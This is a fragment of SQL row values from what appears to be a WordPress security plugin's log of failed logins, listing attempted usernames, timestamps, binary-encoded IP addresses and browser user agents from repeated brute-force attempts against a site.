(9395, 33175, 1694837163.760808, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ+ûÝË', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9396, 33176, 1694837168.076192, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿp¦†á', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
(9397, 33177, 1694837174.590947, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg‡FÚ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9398, 33177, 1694837174.604996, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg‡FÚ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9399, 33178, 1694837178.950910, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯kÙñ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9400, 33179, 1694837183.928246, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ8È', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9401, 33179, 1694837183.937771, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ8È', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9402, 33180, 1694837189.572930, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«íÆ\\', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9403, 33181, 1694837193.448618, 1, 'loginFailInvalidUsername', 'lovely123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|xº	', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9404, 33182, 1694837197.082743, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ(,', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46'),
(10626, 51465, 1712320712.832023, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgFÊÝ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10624, 51462, 1712320709.921313, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.1n', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10625, 51464, 1712320711.442475, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿS÷æ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10623, 51461, 1712320695.515895, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$ÒA', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10622, 51460, 1712320694.248096, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.ç', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10621, 51458, 1712320687.611146, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ]ŒÞq', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10620, 51457, 1712320679.501606, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½?âz', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10619, 51456, 1712320677.650796, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ|¥', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10618, 51454, 1712320673.261216, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ­"IP', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10617, 51453, 1712320667.672403, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉ—è', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10616, 51452, 1712320664.778702, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹µl±', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10615, 51451, 1712320660.355669, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+)ß', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10614, 51450, 1712320655.618672, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºØ!þ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10613, 51449, 1712320652.836877, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ìwñ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10612, 51448, 1712320651.025641, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅÍvâ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10611, 51444, 1712320646.023083, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxL5', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10610, 51443, 1712320642.922291, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿYmpš', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10609, 51440, 1712320632.177173, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Âè', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10608, 51439, 1712320628.329471, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž\ZD', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10606, 51435, 1712320615.707305, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ“ëÑê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10607, 51438, 1712320627.644979, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËm,Ô', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10605, 51434, 1712320607.266377, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ³ŸÁ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10604, 51433, 1712320603.518699, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Ñ9¨', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10603, 51432, 1712320590.883026, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)­š', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10602, 51430, 1712320578.084831, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz­²', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9920, 44327, 1704366387.442237, 1, 'loginFailInvalidUsername', 'wordpress_admin_bak', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWjñ‚', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9921, 44327, 1704366387.461593, 1, 'loginFailInvalidUsername', 'wordpress_admin_bak', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWjñ‚', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9922, 44333, 1704380978.914449, 1, 'loginFailInvalidUsername', 'server', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿØ0´\Z', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9923, 44334, 1704380979.671647, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿØ0´\Z', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9924, 44335, 1704381082.673355, 1, 'loginFailInvalidUsername', 'bimak73555', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÌ…', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9925, 44336, 1704381083.115885, 1, 'loginFailInvalidUsername', 'stender', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÌ…', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9843, 42182, 1701376673.762914, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=º', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9926, 44337, 1704381084.703853, 1, 'loginFailInvalidUsername', 'wpcore', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"yÛ«', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9844, 42186, 1701378500.597864, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=º', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9845, 42193, 1701382067.459413, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),
(9846, 42198, 1701384134.142300, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),
(9847, 42201, 1701385641.452057, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),
(9848, 42203, 1701387609.935433, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),
(9849, 42204, 1701388314.703426, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9850, 42293, 1701402130.934372, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿõlR', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9851, 42304, 1701414843.640420, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"¢öC', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9852, 42305, 1701414844.860900, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"¢öC', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9853, 42306, 1701414846.052015, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"¢öC', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9854, 42310, 1701419876.772888, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),
(9855, 42313, 1701420586.916781, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9856, 42324, 1701422659.556377, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹Š', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9857, 42328, 1701423285.402591, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½À', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9858, 42332, 1701424005.211365, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9859, 42333, 1701424026.067430, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9860, 42339, 1701424746.435003, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹ö', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),
(9861, 42340, 1701425019.127733, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9862, 42342, 1701425494.302418, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9863, 42348, 1701426476.605437, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9864, 42358, 1701430284.681333, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),
(9865, 42365, 1701441899.570054, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9866, 42379, 1701448056.527682, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),
(9927, 44338, 1704381084.766394, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"yÛ«', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9928, 44339, 1704381143.933720, 1, 'loginFailInvalidUsername', 'greeceman', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>±©', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9954, 44373, 1704424494.388638, 1, 'loginFailInvalidUsername', 'jisuo', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀþú±', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9955, 44374, 1704424530.706228, 1, 'loginFailInvalidUsername', 'thuylt', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂó4‡', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9956, 44375, 1704424531.098214, 1, 'loginFailInvalidUsername', 'wordpress_administratora', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂó4‡', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9957, 44376, 1704424568.329489, 1, 'loginFailInvalidUsername', 'wp_postadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3MÓ”', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9958, 44377, 1704424568.623338, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3MÓ”', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9959, 44378, 1704424569.223071, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGæ:', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9960, 44379, 1704424569.234679, 1, 'loginFailInvalidUsername', 'ac', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇ¼Èà', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9961, 44380, 1704424570.038102, 1, 'loginFailInvalidUsername', 'wpadmins', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇ¼Èà', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9962, 44381, 1704424570.242237, 1, 'loginFailInvalidUsername', 'xuanphong', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGæ:', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9963, 44382, 1704424570.585166, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹ÂŽ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9964, 44383, 1704424570.608524, 1, 'loginFailInvalidUsername', 'wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹ÂŽ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9965, 44384, 1704424596.277549, 1, 'loginFailInvalidUsername', 'swilliams', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>°', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9966, 44385, 1704424596.404237, 1, 'loginFailInvalidUsername', 'zestful', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>°', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9967, 44386, 1704424625.152414, 1, 'loginFailInvalidUsername', 'hxq1879', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ•{Î', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9968, 44387, 1704424625.667999, 1, 'loginFailInvalidUsername', 'wp-admine', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ•{Î', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9969, 44388, 1704424651.553577, 1, 'loginFailInvalidUsername', 'MUWY', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3DÓ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9970, 44389, 1704424651.673826, 1, 'loginFailInvalidUsername', 'happy', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3DÓ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9971, 44390, 1704424677.323411, 1, 'loginFailInvalidUsername', 'lashkari', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#¹oO', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9972, 44391, 1704424677.986340, 1, 'loginFailInvalidUsername', 'Vikash', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#¹oO', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9973, 44391, 1704424678.000514, 1, 'loginFailInvalidUsername', 'Vikash', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#¹oO', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9974, 44392, 1704424697.468202, 1, 'loginFailInvalidUsername', 'SEOExpert', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿwÏO', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10168, 49255, 1710228178.428319, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¤DÄ', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),
(10169, 49324, 1710239011.561896, 1, 'loginFailInvalidUsername', 'aaa', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†¦', 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10170, 49338, 1710268822.248964, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),
(10171, 49339, 1710268822.337392, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-?ì', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(10172, 49342, 1710268830.888626, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1\0Ë', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),
(10173, 49344, 1710268832.639964, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ•­', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),
(10174, 49345, 1710268845.476199, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¢Òbú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),
(10175, 49348, 1710268860.411447, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿiž', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9824, 41957, 1701344172.895505, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9823, 41918, 1701337177.659987, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9822, 41913, 1701334608.702269, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½:', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9821, 41908, 1701334255.929727, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb0Ÿ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9820, 41851, 1701327297.030532, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9819, 41837, 1701326565.506982, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9818, 41811, 1701324820.284533, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9817, 41809, 1701324408.160961, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~Ö', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),
(9816, 41808, 1701324023.859750, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
